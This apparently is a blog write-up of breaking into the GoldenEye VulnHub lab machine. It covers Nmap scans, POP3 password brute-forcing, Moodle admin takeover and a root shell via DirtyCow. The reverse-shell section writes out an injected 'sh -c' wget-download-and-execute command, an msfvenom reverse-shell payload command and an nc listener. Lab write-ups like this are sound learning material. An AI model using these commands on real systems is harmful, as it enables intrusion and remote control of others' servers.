Reading Time: 7 minutes

To break the boredom during the long flight. I had planned to play with machine GoldenEye from VulnHub. Not only does it challenge my skills it also helps me pass through those arduous journeys soon.

Scanning

Once the .ova file was downloaded, I imported it into VirtualBox and by doing a Nmap scan for the entire network (192.168.99.100/24). It revealed the IP address assigned to the machine as 192.168.99.100. Then I did a quick Nmap scan and below are the results:

# Nmap -T4 -F 192.168.99.100
Nmap scan report for 192.168.99.100
Host is up (0.00013s latency).
Not shown: 98 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
MAC Address: 08:00:27:E6:5A:ED (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds

Web Server

On looking at the web server it had the following message:

On navigating to the page (mentioned in the image), it showed a login prompt the Javascript which was used in the index page had the credentials (password was in base 64 encoded form) to login into sev-home post login page:

It gave a hint that pop3 is running on an unconventional port. Doing an intense Nmap scan gave the following result indicating that pop3 is running on port 55006 and 55007.

Nmap scan report for 192.168.99.100

Host is up (0.00041s latency).

Not shown: 65531 closed ports

PORT STATE SERVICE VERSION

25/tcp open smtp Postfix smtpd

|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,

| ssl-cert: Subject: commonName=ubuntu

| Issuer: commonName=ubuntu

| Public Key type: rsa

| Public Key bits: 2048

| Signature Algorithm: sha256WithRSAEncryption

| Not valid before: 2018-04-24T03:22:34

| Not valid after: 2028-04-21T03:22:34

| MD5: cd4a d178 f216 17fb 21a6 0a16 8f46 c8c6

|_SHA-1: fda3 fc7b 6601 4746 96aa 0f56 b126 1c29 36e8 442c

|_ssl-date: TLS randomness does not represent time

80/tcp open http Apache httpd 2.4.7 ((Ubuntu))

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache/2.4.7 (Ubuntu)

|_http-title: GoldenEye Primary Admin Server

55006/tcp open ssl/pop3 Dovecot pop3d

|_pop3-capabilities: UIDL PIPELINING SASL(PLAIN) RESP-CODES USER AUTH-RESP-CODE TOP CAPA

| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server

| Issuer: commonName=localhost/organizationName=Dovecot mail server

| Public Key type: rsa

| Public Key bits: 2048

| Signature Algorithm: sha256WithRSAEncryption

| Not valid before: 2018-04-24T03:23:52

| Not valid after: 2028-04-23T03:23:52

| MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63

|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77

|_ssl-date: TLS randomness does not represent time

55007/tcp open pop3 Dovecot pop3d

|_pop3-capabilities: AUTH-RESP-CODE PIPELINING RESP-CODES UIDL USER SASL(PLAIN) STLS TOP CAPA

| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server

| Issuer: commonName=localhost/organizationName=Dovecot mail server

| Public Key type: rsa

| Public Key bits: 2048

| Signature Algorithm: sha256WithRSAEncryption

| Not valid before: 2018-04-24T03:23:52

| Not valid after: 2028-04-23T03:23:52

| MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63

|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77

|_ssl-date: TLS randomness does not represent time

Enumeration

The sev-home page had the details of the GoldenEye Network Operator Supervisors names prompting to perform a dictionary attack. For those accounts on pop3, hydra came to the rescue and the password was not complex so it was easy to crack it with the word list available in Kali Linux. Checking the mails using telnet to connect to pop3 (used commands USER, PASS, STAT – to get statistics and RETR n – to retrieve message), it gave a hint that a new trainee Xenia has joined the company and she had to be given access to the application. Furthermore, the host entry ‘192.168.99.100 severnaya-station.com‘ had to be added to the ‘/etc/hosts’ file to access the application. This was required for the host headers to have ‘severnaya-station.com’. One of the emails received by Natalyn, had the login credentials for the moodle post login. It said that Xenia doesn’t have access to view the course, but there was a welcome message from Dr_dork specifying his username as ‘doak’. It was possible to crack his password and obtain his credentials from pop3 and the mail revealed a secret image. Looking for the string in the image gave a base64 encoded password and it was the admin password to the Moodle system.

Reverse Shell

To get a reverse shell, you need to follow the following steps in Moodle:

  1. Change the executable path of ‘spellcheck’ to run code.
  2. Replace the default spell check processor of TinyMCE HTML editor to ‘PSpellSpell'(as this is the one that uses the spellcheck binary used in the path)
  3. Changing the path variable of aspell form ‘System paths’ under Server to sh -c ‘(wget http://192.168.99.101/metershell -O /tmp/metershell; chmod +x /tmp/metershell;/tmp/metershell &)’ and save the settings
  1. Generate a payload from msfvenom using the command msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.99.101 LPORT=443 -f elf -o metershell replace the IP address of the machine.
  2. Start the webserver on port 80 either using the apache or python -m SimpleHTTPServer 80
  3. Start the lister for the reverse shell using the command nc -lvp 443
  4. Go to any page where TinyMCE is used. For example, blog and add some text and do a spell check. Doing this will get us a reverse shell like the one mentioned in the screenshot below:

Privilege Elevation

The Linux kernel was running on an older version and it was vulnerable to DirtyCow. Compiling the exploit and running it gave a root shell.

Although the challenges were not too complex, it was fun getting the root shell and it kept me away from the boredom during my journey.

LEAVE A REPLY

Please enter your comment!
Please enter your name here

*